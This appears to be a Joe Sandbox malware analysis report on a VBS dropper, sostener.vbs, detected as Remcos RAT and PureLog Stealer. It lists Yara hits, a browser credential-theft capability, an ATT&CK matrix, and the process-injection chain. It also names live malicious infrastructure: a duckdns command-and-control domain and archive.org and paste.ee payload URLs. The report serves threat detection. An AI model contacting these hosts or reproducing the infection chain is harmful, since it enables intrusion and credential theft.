            Yara detected Remcos RAT
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040BA12
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db7_2_0040BB30

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-XDNGQ0Jump to behavior
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a055bad0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a7dc0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a055bad0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a7dc0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe7_2_0040569A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Native API            		221
            Scripting            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		3
            Obfuscated Files or Information            		211
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol211
            Input Capture            		12
            Ingress Tool Transfer            		Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Software Packing            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		Login Hook1
            Windows Service            		1
            DLL Side-Loading            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Non-Standard Port            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon Script222
            Process Injection            		1
            Bypass User Account Control            		LSA Secrets33
            System Information Discovery            		SSHKeylogging1
            Remote Access Software            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials21
            Security Software Discovery            		VNCGUI Input Capture2
            Non-Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync31
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal Capture23
            Application Layer Protocol            		Exfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
            Process Injection            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519309 Sample: sostener.vbs Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 32 paste.ee 2->32 34 newssssssssssssss.duckdns.org 2->34 36 ia600100.us.archive.org 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 58 12 other signatures 2->58 9 wscript.exe 1 2->9         started        signatures3 54 Connects to a pastebin service (likely for C&C) 32->54 56 Uses dynamic DNS services 34->56 process4 signatures5 72 VBScript performs obfuscated calls to suspicious functions 9->72 74 Suspicious powershell command line found 9->74 76 Wscript starts Powershell (via cmd or directly) 9->76 78 3 other signatures 9->78 12 powershell.exe 7 9->12         started        process6 signatures7 80 Suspicious powershell command line found 12->80 82 Obfuscated command line found 12->82 84 Found suspicious powershell code related to unpacking or dynamic code loading 12->84 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 paste.ee 188.114.97.3, 443, 49712 CLOUDFLARENETUS European Union 15->40 42 ia600100.us.archive.org 207.241.227.240, 443, 49711 INTERNET-ARCHIVEUS United States 15->42 44 Writes to foreign memory regions 15->44 46 Injects a PE file into a foreign processes 15->46 21 AddInProcess32.exe 15->21         started        24 AddInProcess32.exe 3 2 15->24         started        28 AddInProcess32.exe 15->28         started        signatures10 process11 dnsIp12 60 Contains functionality to bypass UAC (CMSTPLUA) 21->60 62 Contains functionalty to change the wallpaper 21->62 64 Contains functionality to steal Chrome passwords or cookies 21->64 70 3 other signatures 21->70 38 newssssssssssssss.duckdns.org 181.236.206.3, 2404, 49713, 49715 TELEBUCARAMANGASAESPCO Colombia 24->38 30 C:\ProgramData\remcos\registros.dat, data 24->30 dropped 66 Detected Remcos RAT 24->66 68 Installs a global keyboard hook 24->68 file13 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            sostener.vbs3%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
            http://paste.ee0%Avira URL Cloudsafe
            https://www.google.com;0%Avira URL Cloudsafe
            https://analytics.paste.ee0%Avira URL Cloudsafe
            https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://paste.ee0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://ia600100.us.arX0%Avira URL Cloudsafe
            https://oneget.org0%URL Reputationsafe
            https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt100%Avira URL Cloudmalware
            https://analytics.paste.ee;0%Avira URL Cloudsafe
            https://ia600100.us.archive.org0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
            https://paste.ee/d/WksSo/00%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
            newssssssssssssss.duckdns.org100%Avira URL Cloudmalware
            https://secure.gravatar.com0%Avira URL Cloudsafe
            http://ia600100.us.archive.org0%Avira URL Cloudsafe
            https://themes.googleusercontent.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ia600100.us.archive.org
            		207.241.227.240
            		truefalse
              		unknown
              paste.ee
              		188.114.97.3
              		truetrue
                		unknown
                newssssssssssssss.duckdns.org
                		181.236.206.3
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txttrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://paste.ee/d/WksSo/0true
                  • Avira URL Cloud: safe
                  		unknown
                  newssssssssssssss.duckdns.orgtrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://paste.eepowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000004.00000002.2253846406.000001B0907A9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Contentpowershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com;powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ia600100.us.arXpowershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://analytics.paste.eepowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://paste.eepowershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpAddInProcess32.exefalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.compowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://oneget.orgXpowershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://analytics.paste.ee;powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2311160926.000001FE9597A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2311160926.000001FE95994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2311160926.000001FE959C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://secure.gravatar.compowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://oneget.orgpowershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.2253846406.000001B090E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.97.3
                  		paste.eeEuropean Union
                  		13335CLOUDFLARENETUStrue
                  181.236.206.3
                  		newssssssssssssss.duckdns.orgColombia
                  		22368TELEBUCARAMANGASAESPCOtrue
                  207.241.227.240
                  		ia600100.us.archive.orgUnited States
                  		7941INTERNET-ARCHIVEUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519309
                  Start date and time:2024-09-26 10:57:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 31s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:sostener.vbs
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@12/6@11/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 195
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 2784 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6784 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: sostener.vbs

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:58:01API Interceptor42x Sleep call for process: powershell.exe modified
                  04:58:39API Interceptor2226230x Sleep call for process: AddInProcess32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                  • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                  QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/Ky4pZ0WB/download
                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                  • www.1win-moldovia.fun/1g7m/
                  http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                  • www.tiktok758.com/img/logo.4c830710.svg
                  TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                  • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                  • www.rtprajalojago.live/2wnz/
                  (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                  • dddotx.shop/Mine/PWS/fre.php
                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/DiF66Hbf/download
                  http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                  • easyantrim.pages.dev/id.html
                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  • filetransfer.io/data-package/13rSMZZi/download
                  207.241.227.240SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                    LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                      hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                          TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                              Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                    Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      newssssssssssssss.duckdns.orgsostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 181.236.124.3
                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                      • 152.202.226.171
                                      LisectAVT_2403002C_25.exeGet hashmaliciousRemcosBrowse
                                      • 152.202.253.94
                                      17205148126ac2da6bb98bfbbdf0e8548ffc9b1a78b4d8987ee78be9cae98ea22e5237be9b532.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 152.202.240.123
                                      hovi2pkz3f.exeGet hashmaliciousRemcosBrowse
                                      • 172.94.54.167
                                      paste.eehnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                      • 188.114.97.3
                                      wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                      • 188.114.96.3
                                      Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                                      • 188.114.97.3
                                      reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                                      • 188.114.97.3
                                      New_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      asd.wsfGet hashmaliciousXWormBrowse
                                      • 188.114.97.3
                                      Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                      • 188.114.97.3
                                      ia600100.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                      • 207.241.227.240
                                      wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                      • 207.241.227.240
                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                      • 207.241.227.240
                                      SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttps://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                      • 172.67.181.118
                                      HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                      • 162.159.61.3
                                      http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                      • 104.21.74.63
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                      • 104.21.37.97
                                      3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.208.139
                                      HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                      • 104.21.17.90
                                      INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                                      • 207.241.237.3
                                      LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                      • 207.241.227.240
                                      wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                      • 207.241.227.240
                                      TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      • 207.241.227.240
                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 207.241.227.240
                                      TELEBUCARAMANGASAESPCOkz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                      • 201.221.134.74
                                      bVMuPnsMIq.elfGet hashmaliciousMiraiBrowse
                                      • 190.96.128.60
                                      YfM6hAPQaS.elfGet hashmaliciousMiraiBrowse
                                      • 190.96.128.48
                                      arm7.elfGet hashmaliciousMiraiBrowse
                                      • 190.96.128.56
                                      2YEUP84vcy.elfGet hashmaliciousMiraiBrowse
                                      • 190.13.19.189
                                      4eGsl7kZ8Y.elfGet hashmaliciousMiraiBrowse
                                      • 190.13.25.73
                                      MGmADocDSa.elfGet hashmaliciousMiraiBrowse
                                      • 170.80.8.38
                                      zEtEDBaBLY.elfGet hashmaliciousMiraiBrowse
                                      • 190.96.128.97
                                      LUNFk2Hgfu.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 190.96.128.66
